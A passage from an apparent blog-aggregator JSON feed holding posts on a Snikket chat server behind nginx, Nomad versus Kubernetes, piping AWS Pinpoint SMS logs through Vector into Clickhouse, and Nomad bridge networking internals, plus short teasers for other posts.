share.chat.ravidwivedi.in;\n\n  location \u002F {\n      proxy_pass http:\u002F\u002Flocalhost:5080\u002F;\n      proxy_set_header      Host              $host;\n      proxy_set_header      X-Forwarded-For   $proxy_add_x_forwarded_for;\n\n      # This is the maximum size of uploaded files in Snikket\n      client_max_body_size 104857616; # 100MB + 16 bytes\n  }\n}\n\nserver {\n  # Accept HTTPS connections\n  listen [::]:443 ssl ipv6only=on;\n  listen 443 ssl;\n  ssl_certificate \u002Fpath\u002Fto\u002Fcertificate.pem;\n  ssl_certificate_key \u002Fpath\u002Fto\u002Fkey.pem;\n\n  server_name chat.ravidwivedi.in;\n  server_name groups.chat.ravidwivedi.in;\n  server_name share.chat.ravidwivedi.in;\n\n  location \u002F {\n      proxy_pass https:\u002F\u002Flocalhost:5443\u002F;\n      proxy_set_header      Host              $host;\n      proxy_set_header      X-Forwarded-For   $proxy_add_x_forwarded_for;\n      # REMOVE THIS IF YOU CHANGE `localhost` TO ANYTHING ELSE ABOVE\n      proxy_ssl_verify      off;\n      proxy_set_header      X-Forwarded-Proto https;\n      proxy_ssl_server_name on;\n\n      # This is the maximum size of uploaded files in Snikket\n      client_max_body_size 104857616; # 100MB + 16 bytes\n\n      # For BOSH and WebSockets\n      proxy_set_header Connection $http_connection;\n      proxy_set_header Upgrade $http_upgrade;\n      proxy_read_timeout 900s;\n\n  }\n}\n\nIn the above config, we need to specify path to our certificates created by certbot in an earlier step of this guide. 
Locate the following lines:\nssl_certificate \u002Fpath\u002Fto\u002Fcertificate.pem;\nssl_certificate_key \u002Fpath\u002Fto\u002Fkey.pem;\n\nThe output of my certbot command earlier told me that the certificate is at \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Ffullchain.pem and the key is at \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Fprivkey.pem\nSo we change the above-mentioned two lines in the nginx config at \u002Fetc\u002Fnginx\u002Fsites-available\u002Fchat.ravidwivedi.in to:\nssl_certificate \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Ffullchain.pem;\nssl_certificate_key \u002Fetc\u002Fletsencrypt\u002Flive\u002Fchat.ravidwivedi.in\u002Fprivkey.pem;\n\nAfter making these changes to the file, save it. Now, create a symlink at \u002Fetc\u002Fnginx\u002Fsites-enabled\u002Fchat.ravidwivedi.in by running the command:\nln -s \u002Fetc\u002Fnginx\u002Fsites-available\u002Fchat.ravidwivedi.in \u002Fetc\u002Fnginx\u002Fsites-enabled\u002Fchat.ravidwivedi.in\n\nRestart nginx:\nsystemctl restart nginx\n\nYou can also check whether the nginx syntax is correct by running\nnginx -t\n\nIf the output of this command indicates an error, you need to fix that error before moving on.\nLaunch Snikket\nGo back into the \u002Fetc\u002Fsnikket directory by running:\ncd \u002Fetc\u002Fsnikket\n\nNow run:\ndocker-compose up -d\n\nAfter the command completes, visit chat.ravidwivedi.in and you will see a login page as in the screenshot below.\nIf you don’t see this login page, there is some error in your setup.\nIf you are able to see that login page, create an account with admin privileges by running the command:\ndocker exec snikket create-invite --admin --group default\n\nPost install\nThe Snikket project has a page mentioning additional lines you can add to your Snikket config file - for example, to set a limit on the size of each attachment. Also, check out the upgrade page on how to keep the Snikket software updated.\nIf you are using Snikket, be sure to donate to the Snikket project to support them.",[],{"slug":1197,"title":1198,"link":1199,"pubDate":1200,"contentSnippet":1201,"tags":1202,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"nomad-k8s-showdown","Nomad can do everything that K8s can","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fnomad-k8s-showdown\u002F","2023-07-23T05:34:47.000Z","This blog post was ignited by the following Twitter exchange:\n\nI don’t take accusations of unsubstantiated argument lightly, especially on a technical topic. I firmly believe in substantiated arguments and hence, here I am, elaborating on my stance. If found mistaken, I am open to corrections and will revise my stance.\nSome Historical Context#\nIn my professional capacity, I have run and managed several K8s clusters (using AWS EKS) for our entire team of devs (been there, done that). The most complex piece of our otherwise simple and clean stack was K8s, and we’d been longing to find a better replacement. None of us knew whether that would be Nomad or anything else. But we took the chance, and we have reached a stage where we can objectively argue that, for our specific workloads, Nomad has proven to be a superior tool compared to K8s.\nBuilding with Nomad#\nNomad presents a fundamental building-block approach to designing your own services. It used to be true that Nomad was primarily a scheduler, and for serious production workloads, you had to rely on Consul for service discovery and Vault for secret management.
However, this scenario has changed as Nomad now seamlessly integrates these features, making them first-class citizens in its environment. Our team replaced our HashiCorp stack with just Nomad, and we never felt constrained compared to what we could have accomplished with Consul\u002FVault. While these tools still hold relevance for larger clusters managed by numerous teams, they are not necessary for our use case.\nDeconstructing Infrastructure#\nKubernetes employs a declarative state for every operation in the cluster, essentially operating as a reconciliation mechanism to keep everything in check. In contrast, Nomad requires dealing with fewer components, making it appear lacking compared to K8s’s concept of everything being a “resource.” However, that is far from the truth.\nIngress: We run a set of HAProxy instances on a few nodes which act as “L7 LBs”. Configured with Nomad services, they can do the routing based on Host headers.\nDNS: To provide external access to a service without using a proxy, we developed a tool that scans all services registered in the cluster and creates a corresponding DNS record on AWS Route53.\nMonitoring: Ah, my fav. You wanna monitor your K8s cluster? Sure, here’s kube-prometheus, prometheus-operator, kube-state-metrics. Choices, choices. Enough to confuse you for days. Anyone who’s ever deployed any of these, tell me why this thing needs such a monstrous setup of CRDs and operators. Monitoring Nomad is such a breeze: 3 lines of HCL config and done.\nStatefulsets: It’s 2023 and the irony is rich - the recommended way to run a database inside K8s is… not to run it inside K8s at all. In Nomad, we run a bunch of EC2 instances and tag them as db nodes. The DBs don’t float around as containers to random nodes. And there’s no CSI plugin reaching for a storage disk in AZ-1 when the node is basking in AZ-2. Running a DB on Nomad feels refreshingly like running it on an unadorned EC2 instance.\nAutoscale: All our client nodes (except for the db nodes) are ephemeral and part of AWS’s Auto Scaling Groups (ASGs). We use ASG rules for the horizontal scaling of the cluster. While Nomad does have its own autoscaler, our preference is to run large instances dedicated to specific workloads, avoiding a mix of different workloads on the same machine.\nOver-abstraction of Kubernetes#\nOne of my primary critiques of K8s is its hidden complexities. While these abstractions might simplify things on the surface, debugging becomes a nightmare when issues arise. Even after three years of managing K8s clusters, I’ve never felt confident dealing with databases or handling complex networking problems involving dropped packets.\nYou might argue that it’s about technical chops, which I won’t disagree with - but then, do you want to add value to the business by getting shit done, or do you want to be the resident K8s whiz at your organization?\nConsider this: How many people do you know who run their own K8s clusters? Even the K8s experts themselves preach about running prod clusters on EKS\u002FGKE etc. How many fully leverage all that K8s has to offer? How many are even aware of all the network routing intricacies managed by kube-proxy? If these queries stir up clouds of uncertainty, it’s possible you’re sipping the Kubernetes Kool-Aid without truly comprehending the recipe, much like I found myself doing at one point.\nNomad: Not Perfect, But Simpler#\nNow, if you’re under the impression that I’m singing unabashed praises for Nomad, let me clarify - Nomad has its share of challenges.
I’ve personally encountered and reported several. However, the crucial difference lies in Nomad’s lesser degree of abstraction, which allows for a comprehensive understanding of its internals. For instance, we encountered service reconciliation issues with a particular Nomad version. However, we could query the APIs, identify the problem, and write a bash script to resolve and reconcile it. That wouldn’t have been possible if there were too many moving parts in the system and we didn’t know where to even begin debugging.\nThe YAML hell is all too well known to all of us. In K8s, writing job manifests required a lot of effort (from the developers who don’t work with K8s all day), and the manifests were very complex to understand. It felt “too verbose” and involved copy-pasting large blocks from the docs and trying to make things work. Compare that to HCL: it feels much nicer to read, and shorter. Things are more straightforward to understand.\nI’ve not even touched upon the niceties of Nomad yet. Like more humanly understandable ACLs? A cleaner and simpler job spec, which defines the entire job in one file? A UI which actually shows everything about your cluster, nodes, and jobs? Not restricting your workloads to be run as Docker containers? A single binary which powers all of this?\nThe central question this post aims to raise is: What can K8s do that Nomad can’t, especially considering the features people truly need? My perspectives are informed not only by my organization but also through interactions with several other organizations at various meetups and conferences. Yet, I have rarely encountered a use case that could only be managed by K8s. While Nomad isn’t a panacea for all issues, it’s certainly worth a try. Reducing the complexity of your tech stack can prove beneficial for your applications and, most importantly, your developers.\nAt this point, K8s enjoys immense industry-wide support, while Nomad remains the unassuming newcomer. This contrast is not a negative aspect, per se. Large organizations often gravitate towards complexity and the opportunity to engage more engineers. However, if simplicity were the primary goal, the prevailing sense of overwhelming complexity in the infrastructure and operations domain wouldn’t be as pervasive.\nConclusion#\nI hope my arguments provide a more comprehensive perspective and address the earlier critique of being unsubstantiated.\nUpdate#\nINFO\n    \nDarren has responded to this blog post. You can read the response on Twitter.\nFin!",[],{"slug":1204,"title":1205,"link":1206,"pubDate":1207,"contentSnippet":1208,"tags":1209,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-17","Emerging from dotemacs bankruptcy the hard way: the midway refactor","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-midway-refactor\u002Findex.html","Sun, 23 Jul 2023 00:00:00 +0000","Or the one in which we confront our elisp n00bishness and try to be better at using it. And we learn new habits to understand our Emacs better. Better late than never.",[227,1144,457,1108],{"slug":1211,"title":1212,"link":1213,"pubDate":1214,"contentSnippet":1215,"tags":1216,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"storing-aws-pinpoint-logs","Storing AWS Pinpoint Logs","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fstoring-aws-pinpoint-logs\u002F","2023-07-21T05:24:06.000Z","At $dayjob, we use AWS Pinpoint to send out SMS to our customers.
We’ve also written a detailed blog post on how we use Clickhouse + vector stack for our logging needs. We additionally wanted to store the delivery logs generated by the Pinpoint service. But like with anything else in AWS, even simpler tasks like these usually tend to piggyback on other counterparts of AWS - in this case, it happens to be AWS Kinesis. All the delivery logs which contain metadata about SMS delivery are streamed to Kinesis.\nOur setup involves configuring Pinpoint with Amazon Kinesis Data Firehose stream. Firehose is an ETL service that helps stream events to other persistent stores. Firehose supports multiple such output sinks and in our case we use HTTP sink.\nThis is what the flow looks like:\nPinpoint -> Kinesis Firehose -> Vector HTTP -> Clickhouse\nIngesting Data#\nOn the HTTP server side, we used vector’s aws_kinesis_firehose source. Compared to just using http source, here are the differences I found:\nHas first-class support for access_key. AWS Kinesis can be configured to send access_key which comes as the value X-Amz-Firehose-Access-Key header in the HTTP request. This means that the request which contains an invalid access key will be rejected at the source itself. However, in the http source, I couldn’t find a way to drop events at the source level. It is required to use a VRL transformer to check whether X-Amz-Firehose-Access-Key is present in the headers and do a value comparison with our key.\nHas native support for base64 decoding the payload. This one’s pretty useful and saved me a lot of VRL transformer rules that I would have otherwise written with the http source. So, basically, this is how the server receives the payload:\n{\n  \"requestId\": \"6a14a06b-6eae-4218-...\",\n  \"timestamp\": 1689766125971,\n  \"records\": [\n      {\n          \"data\": \"eyJld...\"\n      },\n      {\n          \"data\": \"eyJldmVudF9...\"\n      }\n  ]\n}\nThe value of the payload is a base64 encoded value of the JSON Object of an SMS event. However, the aws_kinesis_firehose source is smart enough and automagically decodes this list of records and their values into individual events. This is how the final event looks like when using aws_kinesis_firehose source:\n    {\n      \"message\": \"{\\\"event_type\\\":\\\"_SMS.SUCCESS\\\",\\\"event_timestamp\\\":1689827914426,\\\"arrival_timestamp\\\":1689827917659,\\\"event_version\\\":\\\"3.1\\\",\\\"application\\\":{\\\"app_id\\\":\\\"redacted\\\",\\\"sdk\\\":{}},\\\"client\\\":{\\\"client_id\\\":\\\"redacted\\\"},\\\"device\\\":{\\\"platform\\\":{}},\\\"session\\\":{},\\\"attributes\\\":{\\\"sender_request_id\\\":\\\"redacted\\\",\\\"destination_phone_number\\\":\\\"+91xxx\\\",\\\"record_status\\\":\\\"DELIVERED\\\",\\\"iso_country_code\\\":\\\"IN\\\",\\\"mcc_mnc\\\":\\\"xxx\\\",\\\"number_of_message_parts\\\":\\\"1\\\",\\\"message_id\\\":\\\"redacted\\\",\\\"message_type\\\":\\\"Transactional\\\",\\\"origination_phone_number\\\":\\\"redactedORG\\\"},\\\"metrics\\\":{\\\"price_in_millicents_usd\\\":xx.0},\\\"awsAccountId\\\":\\\"redacted\\\"}\\n\",\n      \"request_id\": \"6dd45388-xxx\",\n      \"source_arn\": \"arn:aws:firehose:ap-south-1:redacted:deliverystream\u002Fredacted\",\n      \"source_type\": \"aws_kinesis_firehose\",\n      \"timestamp\": \"2023-07-20T04:39:38.772Z\"\n  }\nThis makes it straightforward because now we just have to parse the JSON inside the message key and do transformations on that object. 
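(In VRL that is essentially a single call - the remap transform later in this post starts with .message = parse_json!(.message) to turn that string into a structured object.)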
If it were the http source, I’d have to loop over the records structure and figure out how to split them into individual events for the rest of the Vector pipeline… which would have been messy, to say the least.\nHere’s the vector config so far:\n[sources.firehose]\n# General\ntype = \"aws_kinesis_firehose\"\naddress = \"127.0.0.1:9000\"\nstore_access_key = false\naccess_keys = [\"superdupersecret\"]\n\n# Use it for debugging\n[sinks.console]\ntype = \"console\"\ninputs = [\"format_pinpoint_logs\"]\nencoding.codec = \"json\"\n\nFormatting the data#\nNow that we have a pipeline which sends and receives data, we can process the events and transform them into a schema that is more desirable. Since we require the events to be queryable in a Clickhouse DB, this is the schema we have:\nCREATE TABLE default.pinpoint_logs (\n    `_timestamp` DateTime('Asia\u002FKolkata'),\n    `app_id` LowCardinality(String),\n    `event_type` LowCardinality(String),\n    `record_status` LowCardinality(String),\n    `origination_phone_number` String,\n    `message_id` String,\n    `destination_phone_number` String,\n    `arrival_timestamp` DateTime('Asia\u002FKolkata'),\n    `event_timestamp` DateTime('Asia\u002FKolkata'),\n    `meta` Nullable(String)\n)\nENGINE = MergeTree\nPARTITION BY toYYYYMM(_timestamp)\nORDER BY _timestamp\nSETTINGS index_granularity = 8192;\nTo achieve the above format, we can use VRL to parse and format our SMS events:\n[transforms.format_pinpoint_logs]\ntype = \"remap\"\ninputs = [\"firehose\"]\nsource = '''\n  # Decode the JSON message and set ingestion timestamp\n  .message = parse_json!(.message)\n  .ingestion_timestamp = .timestamp\n\n  # Convert timestamps from Unix to DateTime\n  .event_timestamp = from_unix_timestamp!(.message.event_timestamp, unit:\"milliseconds\")\n  .arrival_timestamp = from_unix_timestamp!(.message.arrival_timestamp, unit:\"milliseconds\")\n\n  # Extract keys to top level and remove from attributes\n  .record_status = del(.message.attributes.record_status)\n  .origination_phone_number = del(.message.attributes.origination_phone_number)\n  .destination_phone_number = del(.message.attributes.destination_phone_number)\n  .message_id = del(.message.attributes.message_id)\n\n  # Encode the remaining attributes as JSON string\n  .attr = encode_json(.message.attributes)\n\n  # Format Payload for Clickhouse\n  . = {\n    \"_timestamp\": .ingestion_timestamp,\n    \"arrival_timestamp\": .arrival_timestamp,\n    \"event_timestamp\": .event_timestamp,\n    \"app_id\": .message.application.app_id,\n    \"event_type\": .message.event_type,\n    \"record_status\": .record_status,\n    \"message_id\": .message_id,\n    \"origination_phone_number\": .origination_phone_number,\n    \"destination_phone_number\": .destination_phone_number,\n    \"meta\": .attr\n  }\n'''\n\nPlugging this in, we have a clean JSON object for each SMS event. The only thing we now need to add is an output sink to Clickhouse:\n[sinks.clickhouse]\ntype = \"clickhouse\"\ninputs = [\"format_pinpoint_logs\"]\nskip_unknown_fields = true\ncompression = \"gzip\"\ndatabase = \"default\"\nendpoint = \"http:\u002F\u002F127.0.0.1:8123\"\ntable = \"pinpoint_logs\"\nencoding.timestamp_format = \"unix\"\nbatch.max_bytes = 1049000 # 1 MB\nbatch.timeout_secs = 5\nbuffer.max_size = 268435488\nbuffer.type = \"disk\"\nbuffer.when_full = \"block\"\nPerfect!
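(Before starting it, vector validate config.toml is a handy sanity check that catches malformed TOML and unknown options; the exact behaviour of that subcommand may vary by Vector version.)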
On running this pipeline with vector -c config.toml, we can see it consuming the records.\nHope this short post was useful if you have to do anything similar!\nFin!",[],{"slug":1218,"title":1219,"link":1220,"pubDate":1221,"contentSnippet":1222,"tags":1223,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"bridge-network-in-nomad","Bridge Networking in Nomad","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbridge-network-in-nomad\u002F","2023-07-17T05:45:04.000Z","To set the stage, it’s crucial to understand what we mean by “bridge networking”. In a nutshell, it is a type of network connection in Linux that allows virtual interfaces, like the ones used by virtual machines and containers, to share a physical network interface.\nWith Nomad, when a task is allocated, it creates a network namespace with its own network stack. Within this, a virtual ethernet (veth) pair is established, one end of which is assigned to the network namespace of the allocation, while the other remains in the host namespace.\n\nThe Network Journey#\nTo illustrate this practically, let’s assume a packet is sent from a task within an allocation. The packet would first be received by the local end of the veth pair; it would then traverse to the other end residing in the host’s namespace. From there, it is sent to the bridge on the host (in this case, the “nomad” bridge), which finally sends the packet out to the world via the host’s physical network interface (typically “eth0” or its equivalent on your machine).\nThe journey of a packet from the outside world to a task inside an allocation is the exact mirror image. The packet reaches “eth0” first, then the nomad bridge; it is then forwarded to the appropriate veth interface in the host’s namespace. From there, it crosses over to the other end of the veth pair in the allocation’s network namespace and finally gets routed to the destination task.\nTo bridge or not to#\nLet’s take a look at the following jobspec, which deploys my tiny side project, Cloak, on Nomad:\njob \"cloak\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"redis\" {\n    network {\n      mode = \"host\"\n      port \"redis\" {\n        to = 6379\n      }\n    }\n\n    service {\n      name     = \"cloak-redis\"\n      port     = \"redis\"\n      provider = \"nomad\"\n    }\n\n\n    task \"redis\" {\n      driver = \"docker\"\n\n\n      config {\n        image                  = \"redis:7\"\n        advertise_ipv6_address = false\n\n        ports = [\n          \"redis\",\n        ]\n\n        volumes = [\n          \"\u002Fdata\u002Fcloak\u002Fredis:\u002Fdata\",\n        ]\n      }\n\n      resources {\n        cpu    = 500 # MHz\n        memory = 256 # MB\n      }\n    }\n  }\n\n  group \"cloak\" {\n    network {\n      mode = \"host\"\n      port \"cloak\" {\n        static = 7000\n        to     = 7000\n      }\n    }\n\n    task \"cloak\" {\n      driver = \"docker\"\n\n      config {\n        image   = \"ghcr.io\u002Fmr-karan\u002Fcloak:v0.2.0\"\n        command = \"--config=config.toml\"\n        ports = [\n          \"cloak\",\n        ]\n      }\n\n      template {\n        data        = \u003C\u003CEOH\n# Configuration for 1 redis instance, as assigned via rendezvous hashing.\n{{$allocID := env \"NOMAD_ALLOC_ID\" -}}\n{{range nomadService 1 $allocID \"cloak-redis\"}}\nCLOAK_REDIS__address={{ .Address }}:{{ .Port }}\n{{- end}}\nEOH\n        destination = \"secrets\u002Ffile.env\"\n        env         = true\n      }\n\n\n      resources {\n  
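      # cpu (MHz) and memory (MB) are scheduler reservations: Nomad sets aside roughly this much capacity on a node when placing the task.\n  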
      cpu    = 500 # MHz\n        memory = 700 # MB\n      }\n    }\n  }\n}\nOur focus should be on the network.mode stanza. To illustrate what happens behind the scenes when an alloc runs in network.mode=host (host network), we can run the above job.\nOn the machine, we can see that port 7000 (static) and port 27042 (dynamic) are allocated on the host network interface (eth0):\n\nWe can also see the port and process details using ss:\nsudo ss -ltpn 'sport = :7000'\nState    Recv-Q   Send-Q      Local Address:Port       Peer Address:Port   Process\nLISTEN 0 4096      95.216.165.210:7000    0.0.0.0:*  users:((\"docker-proxy\",pid=67068,fd=4))\nThis config is more suitable for specific workloads - like load balancers or similar deployments where you want to expose the network interface on the host. It’s also helpful for applications running outside of Nomad on that host to connect via the host network interface.\nHowever, typically in a job where you want to connect to multiple different allocs - you’d want to set up a bridge network. This generally avoids exposing the workload on the host network directly. It’s a typical setup where you want to put applications behind a reverse proxy (NGINX\u002FCaddy).\nLet’s change network.mode=bridge in the above job spec and see the changes.\n$ nomad job plan cloak.nomad\n\n+\u002F- Job: \"cloak\"\n+\u002F- Task Group: \"cloak\" (1 create\u002Fdestroy update)\n  + Network {\n      Hostname: \"\"\n    + MBits:    \"0\"\n    + Mode:     \"bridge\"\n    + Static Port {\n      + HostNetwork: \"default\"\n      + Label:       \"cloak\"\n      + To:          \"7000\"\n      + Value:       \"7000\"\n      }\n    }\n  - Network {\n      Hostname: \"\"\n    - MBits:    \"0\"\n    - Mode:     \"host\"\n    - Static Port {\n      - HostNetwork: \"default\"\n      - Label:       \"cloak\"\n      - To:          \"7000\"\n      - Value:       \"7000\"\n      }\n    }\n    Task: \"cloak\"\n\n+\u002F- Task Group: \"redis\" (1 create\u002Fdestroy update)\n  + Network {\n      Hostname: \"\"\n    + MBits:    \"0\"\n    + Mode:     \"bridge\"\n    + Dynamic Port {\n      + HostNetwork: \"default\"\n      + Label:       \"redis\"\n      + To:          \"6379\"\n      }\n    }\n  - Network {\n      Hostname: \"\"\n    - MBits:    \"0\"\n    - Mode:     \"host\"\n    - Dynamic Port {\n      - HostNetwork: \"default\"\n      - Label:       \"redis\"\n      - To:          \"6379\"\n      }\n    }\n    Task: \"redis\"\nNow we don’t see the ports forwarded on the host network:\n\nSimilarly, ss also shows no process listening on the host network\n\nIPTables and Routing#\nTo understand what happened when we switched the networking mode to bridge, we need to take a look at the Nomad iptables magic which comes into play when using bridge network.\nI pulled up the iptables and saw specific rules under the chains CNI-FORWARD and NOMAD-ADMIN. 
These rules, in essence, allow all traffic to and from the allocation’s network namespace.\n$ sudo iptables -L CNI-FORWARD\nChain CNI-FORWARD (1 references)\ntarget     prot opt source               destination         \nNOMAD-ADMIN  all  --  anywhere             anywhere             \u002F* CNI firewall plugin admin overrides *\u002F\nACCEPT     all  --  anywhere             172.26.64.5          ctstate RELATED,ESTABLISHED\nACCEPT     all  --  172.26.64.5          anywhere            \nACCEPT     all  --  anywhere             172.26.64.6          ctstate RELATED,ESTABLISHED\nACCEPT     all  --  172.26.64.6          anywhere\n\nsudo iptables -L NOMAD-ADMIN\nChain NOMAD-ADMIN (1 references)\ntarget     prot opt source               destination         \nACCEPT     all  --  anywhere             172.26.64.0\u002F20\nNomad uses 172.26.64.0\u002F20 as the default subnet for the bridge network. The IPs 172.26.64.5 and 172.26.64.6 are assigned to two different allocs in this CIDR. The iptables rules allow all traffic to flow on this subnet.\nTo check the routing, the ip route command can be used.\n$ ip route show 172.26.64.0\u002F20\n172.26.64.0\u002F20 dev nomad proto kernel scope link src 172.26.64.1\nIt uses the nomad network interface for routing packets related to the default bridge network.\nUsing nsenter, we can find more details about the network namespace created for an alloc. Let’s find details about the redis alloc:\nsudo nsenter -t $(pgrep redis) --net ip addr\n\n1: lo: \u003CLOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\u002Floopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\u002F8 scope host lo\n       valid_lft forever preferred_lft forever\n2: eth0@if113: \u003CBROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default \n    link\u002Fether 76:47:6d:49:00:c0 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n    inet 172.26.64.5\u002F20 brd 172.26.79.255 scope global eth0\n       valid_lft forever preferred_lft forever\n\nWe can see that one end of the pair is eth0 (the container’s interface), which is connected to a network interface with index 113. For the tunnel to actually work, the other end of the veth pair should also exist on the host:\n$ ip a\n113: veth3402deda@if2: \u003CBROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master nomad state UP group default \n    link\u002Fether 3a:85:1b:37:75:17 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n    inet6 fe80::3885:1bff:fe37:7517\u002F64 scope link \n       valid_lft forever preferred_lft forever\nSo, when we see veth3402deda@if2 in the host’s network namespace (with the index 113), and then we see eth0@if113 inside the Redis container, we can infer that these two interfaces form a veth pair: veth3402deda@if2 on the host side and eth0 inside the container. This connection enables the container to communicate with the external network through the host’s network stack.\nCapturing packets#\nWe can capture TCP packets on the veth interface to see the routing work:\nsudo tcpdump -i veth971858d5 -n\ntcpdump: verbose output suppressed, use -v[v]... 
for full protocol decode\nlistening on veth971858d5, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n10:51:27.801319 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [S], seq 1331933249, win 65495, options [mss 65495,sackOK,TS val 248300785 ecr 0,nop,wscale 7], length 0\n10:51:27.801549 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [S.], seq 107697826, ack 1331933250, win 65160, options [mss 1460,sackOK,TS val 3965422857 ecr 248300785,nop,wscale 7], length 0\n10:51:27.801616 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [.], ack 1, win 512, options [nop,nop,TS val 248300785 ecr 3965422857], length 0\n10:51:27.801737 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [P.], seq 1:79, ack 1, win 512, options [nop,nop,TS val 248300786 ecr 3965422857], length 78\n10:51:27.801751 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [.], ack 79, win 509, options [nop,nop,TS val 3965422858 ecr 248300786], length 0\n10:51:27.802022 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [P.], seq 1:4097, ack 79, win 509, options [nop,nop,TS val 3965422858 ecr 248300786], length 4096\n10:51:27.802059 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [.], ack 4097, win 491, options [nop,nop,TS val 248300786 ecr 3965422858], length 0\n10:51:27.802120 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [P.], seq 4097:5396, ack 79, win 509, options [nop,nop,TS val 3965422858 ecr 248300786], length 1299\n10:51:27.802135 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [.], ack 5396, win 502, options [nop,nop,TS val 248300786 ecr 3965422858], length 0\n10:51:27.803484 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [F.], seq 79, ack 5396, win 512, options [nop,nop,TS val 248300787 ecr 3965422858], length 0\n10:51:27.803567 IP 172.26.64.6.7000 > 172.26.64.1.35826: Flags [F.], seq 5396, ack 80, win 509, options [nop,nop,TS val 3965422859 ecr 248300787], length 0\n10:51:27.803597 IP 172.26.64.1.35826 > 172.26.64.6.7000: Flags [.], ack 5397, win 512, options [nop,nop,TS val 248300787 ecr 3965422859], length 0\n10:53:08.523431 IP 172.26.64.6.53042 > 95.216.165.210.27372: Flags [.], ack 2169295212, win 501, options [nop,nop,TS val 735542538 ecr 4133067854], length 0\n10:53:08.523551 IP 95.216.165.210.27372 > 172.26.64.6.53042: Flags [.], ack 1, win 509, options [nop,nop,TS val 4133379150 ecr 735231242], length 0\n10:53:08.523554 IP 95.216.165.210.27372 > 172.26.64.6.53042: Flags [.], ack 1, win 509, options [nop,nop,TS val 4133379150 ecr 735231242], length 0\n10:53:08.523562 IP 172.26.64.6.53042 > 95.216.165.210.27372: Flags [.], ack 1, win 501, options [nop,nop,TS val 735542538 ecr 4133379150], length 0\n\nTo summarize the output, we can see that the log is showing a TCP connection between 172.26.64.1 (source) and 172.26.64.6 (destination), specifically on port 7000. 172.26.64.1 happens to be the gateway for nomad subnet.\nSummary#\nHope this post clarified some networking internals and behind the scenes magic when using Nomad bridge networking. 
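If you ever want to script the veth-pair matching we did by hand above, a minimal Go sketch of the idea could look like this (the peer index is illustrative, taken from the eth0@if113 output above, and it assumes it runs in the host network namespace, scanning sysfs):\npackage main\n\nimport (\n\t\"fmt\"\n\t\"os\"\n\t\"path\u002Ffilepath\"\n\t\"strings\"\n)\n\nfunc main() {\n\t\u002F\u002F Inside the container, eth0@if113 says the host-side peer has ifindex 113.\n\tpeerIndex := \"113\"\n\n\t\u002F\u002F Scan every host interface and compare its ifindex with the peer index.\n\tpaths, err := filepath.Glob(\"\u002Fsys\u002Fclass\u002Fnet\u002F*\u002Fifindex\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfor _, p := range paths {\n\t\tb, err := os.ReadFile(p)\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\t\tif strings.TrimSpace(string(b)) == peerIndex {\n\t\t\tfmt.Println(\"host-side veth peer:\", filepath.Base(filepath.Dir(p)))\n\t\t}\n\t}\n}\nThis is just the sysfs equivalent of eyeballing the @ifN suffixes in the ip a output.\n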
Refer to my other post - Nomad networking explained for a practical breakdown of all the different ways to expose and connect applications in a Nomad cluster.\nFin!",[],{"slug":1225,"title":1226,"link":1227,"pubDate":1228,"contentSnippet":1229,"tags":1230,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"blog-bts-community-event-part-2","Behind the scenes of organising a community-driven event - part 2","https:\u002F\u002Fwww.divyamohan.com\u002Fblog-bts-community-event-part-2\u002F","Fri, 07 Jul 2023 08:05:48 GMT","In the first part of the series, I discussed our why behind organizing a community-driven event that was also the very first edition of Kubernetes Community Days in Mumbai. In this post, we'll dive into the juicy bits of how we went about setting the stage (very literally)",[701,1231,1232,1233],"KCD Mumbai","Community","Blog",{"slug":1235,"title":1236,"link":1237,"pubDate":1238,"contentSnippet":1239,"tags":1240,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-18","Emerging from dotemacs bankruptcy the hard way: package management","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-packages\u002Findex.html","Thu, 06 Jul 2023 00:00:00 +0000","Elpa, Melpa, git repo. Vendor package straight from source. It compiled? Fetch some more! Elpa, Melpa, git repo. In more adult terms, we learn to use use-package to fetch, install, initialise, configure useful packages that enhance our Emacs experience.",[227,1144,457,1108],{"slug":1242,"title":1243,"link":1244,"pubDate":1245,"contentSnippet":1246,"tags":1247,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-19","Emerging from dotemacs bankruptcy the hard way: init begins","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy-init-begins\u002Findex.html","Tue, 04 Jul 2023 00:00:00 +0000","The first action must, of course, be to colour the bikeshed and set some decent 